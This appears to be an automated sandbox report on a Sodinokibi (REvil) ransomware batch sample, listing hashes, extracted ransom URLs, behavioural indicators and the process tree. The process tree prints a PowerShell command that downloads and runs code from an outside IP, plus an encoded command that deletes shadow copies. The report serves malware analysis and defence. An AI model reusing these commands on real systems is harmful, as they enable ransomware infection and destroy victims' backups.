Analysis
max time kernel: 123s
max time network: 129s
platform: windows10_x64
resource: win10
submitted: 08-08-2020 21:10

Static task: static1
Behavioral task: behavioral1
  Sample: d0333bd53e654eef1380155f828b71d5.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: d0333bd53e654eef1380155f828b71d5.bat
  Resource: win10
General
Target: d0333bd53e654eef1380155f828b71d5.bat
Size: 219B
MD5: 72cc00975d3f7dc5564c1a0fdbd1897b
SHA1: 7eac1c6c294cf6a12495a484965884263cd77ff2
SHA256: c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673
SHA512: 9a76771f5f5e726113dca7e35c9ee71c4a2220e673c09b8fe48dd09385e1a2353d91a7002b198dbf136c03a435fa068657f6338a39f0095b148c8056cacf69e9
Malware Config
Extracted: http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5
Extracted: C:\61k34-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B72C4F75A3359B40
  http://decryptor.cc/B72C4F75A3359B40
Signatures

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
Drops file in Program Files directory (24 IoCs)
Processes: powershell.exe
- File created: \??\c:\program files\61k34-readme.txt (powershell.exe)
- File opened for modification: \??\c:\program files\ClearBackup.3gp (powershell.exe)
- File opened for modification: \??\c:\program files\GrantSelect.svgz (powershell.exe)
- File opened for modification: \??\c:\program files\MountUninstall.wmv (powershell.exe)
- File opened for modification: \??\c:\program files\PingBackup.3gp (powershell.exe)
- File opened for modification: \??\c:\program files\WriteLimit.mp3 (powershell.exe)
- File opened for modification: \??\c:\program files\AssertUnlock.rmi (powershell.exe)
- File opened for modification: \??\c:\program files\NewFormat.mp3 (powershell.exe)
- File opened for modification: \??\c:\program files\ReadImport.scf (powershell.exe)
- File opened for modification: \??\c:\program files\ReadReset.vsx (powershell.exe)
- File opened for modification: \??\c:\program files\RenameHide.mpv2 (powershell.exe)
- File opened for modification: \??\c:\program files\ResumeExit.vsx (powershell.exe)
- File opened for modification: \??\c:\program files\SwitchWatch.asp (powershell.exe)
- File opened for modification: \??\c:\program files\DismountUnregister.vbe (powershell.exe)
- File opened for modification: \??\c:\program files\ExpandOptimize.scf (powershell.exe)
- File opened for modification: \??\c:\program files\GetAdd.tiff (powershell.exe)
- File opened for modification: \??\c:\program files\MoveExpand.m4a (powershell.exe)
- File opened for modification: \??\c:\program files\ReceiveStop.mhtml (powershell.exe)
- File created: \??\c:\program files (x86)\61k34-readme.txt (powershell.exe)
- File opened for modification: \??\c:\program files\OutSelect.tiff (powershell.exe)
- File opened for modification: \??\c:\program files\ProtectBackup.htm (powershell.exe)
- File opened for modification: \??\c:\program files\RemoveReceive.odp (powershell.exe)
- File opened for modification: \??\c:\program files\SplitProtect.ogg (powershell.exe)
- File opened for modification: \??\c:\program files\SuspendUse.svg (powershell.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sho4955txf08.bmp" (powershell.exe)
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious use of WriteProcessMemory (6 IoCs)
Processes: cmd.exe, powershell.exe
- PID 3820 wrote to memory of 3828 (cmd.exe -> powershell.exe)
- PID 3820 wrote to memory of 3828 (cmd.exe -> powershell.exe)
- PID 3820 wrote to memory of 3828 (cmd.exe -> powershell.exe)
- PID 3828 wrote to memory of 3896 (powershell.exe -> powershell.exe)
- PID 3828 wrote to memory of 3896 (powershell.exe -> powershell.exe)
- PID 3828 wrote to memory of 3896 (powershell.exe -> powershell.exe)
Blacklisted process makes network request (81 IoCs)
Processes: powershell.exe (PID 3828)
Flows: 4, 8, 10, 11, 13, 15, 17, 19, 21, 23, 25, 32, 34, 36, 38, 40, 43, 45, 46, 48, 50, 52, 54, 56, 58, 61, 63, 65, 67, 69, 71, 72, 74, 76, 79, 81, 83, 85, 87, 89, 91, 93, 95, 97, 99, 100, 102, 104, 105, 107, 108, 109, 111, 113, 115, 119, 121, 123, 125, 126, 127, 128, 131, 133 (all PID 3828, powershell.exe)
Enumerates connected drives (3 TTPs)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
- Token: SeDebugPrivilege, PID 3828 (powershell.exe)
- Token: SeDebugPrivilege, PID 3828 (powershell.exe)
- Token: SeDebugPrivilege, PID 3896 (powershell.exe)
- Token: SeBackupPrivilege, PID 3060 (vssvc.exe)
- Token: SeRestorePrivilege, PID 3060 (vssvc.exe)
- Token: SeAuditPrivilege, PID 3060 (vssvc.exe)
- Token: SeTakeOwnershipPrivilege, PID 3828 (powershell.exe)
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, powershell.exe
- PID 3828 (powershell.exe)
- PID 3828 (powershell.exe)
- PID 3828 (powershell.exe)
- PID 3828 (powershell.exe)
- PID 3828 (powershell.exe)
- PID 3896 (powershell.exe)
- PID 3896 (powershell.exe)
- PID 3896 (powershell.exe)
Modifies extensions of user files (6 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
- File renamed: C:\Users\Admin\Pictures\MoveCheckpoint.tif => \??\c:\users\admin\pictures\MoveCheckpoint.tif.61k34 (powershell.exe)
- File renamed: C:\Users\Admin\Pictures\RepairApprove.crw => \??\c:\users\admin\pictures\RepairApprove.crw.61k34 (powershell.exe)
- File opened for modification: \??\c:\users\admin\pictures\BackupShow.tiff (powershell.exe)
- File renamed: C:\Users\Admin\Pictures\BackupShow.tiff => \??\c:\users\admin\pictures\BackupShow.tiff.61k34 (powershell.exe)
- File renamed: C:\Users\Admin\Pictures\ConnectBlock.png => \??\c:\users\admin\pictures\ConnectBlock.png.61k34 (powershell.exe)
- File renamed: C:\Users\Admin\Pictures\InvokeRedo.crw => \??\c:\users\admin\pictures\InvokeRedo.crw.61k34 (powershell.exe)
Processes

C:\Windows\system32\cmd.exe (depth 1)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d0333bd53e654eef1380155f828b71d5.bat"
- Suspicious use of WriteProcessMemory
PID: 3820

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5');Invoke-RCYSVVOUOPIT;Start-Sleep -s 10000"
  - Drops file in Program Files directory
  - Sets desktop wallpaper using registry
  - Suspicious use of WriteProcessMemory
  - Blacklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Modifies extensions of user files
  PID: 3828

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    PID: 3896

C:\Windows\system32\vssvc.exe (depth 1)
Command line: C:\Windows\system32\vssvc.exe
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID: 3060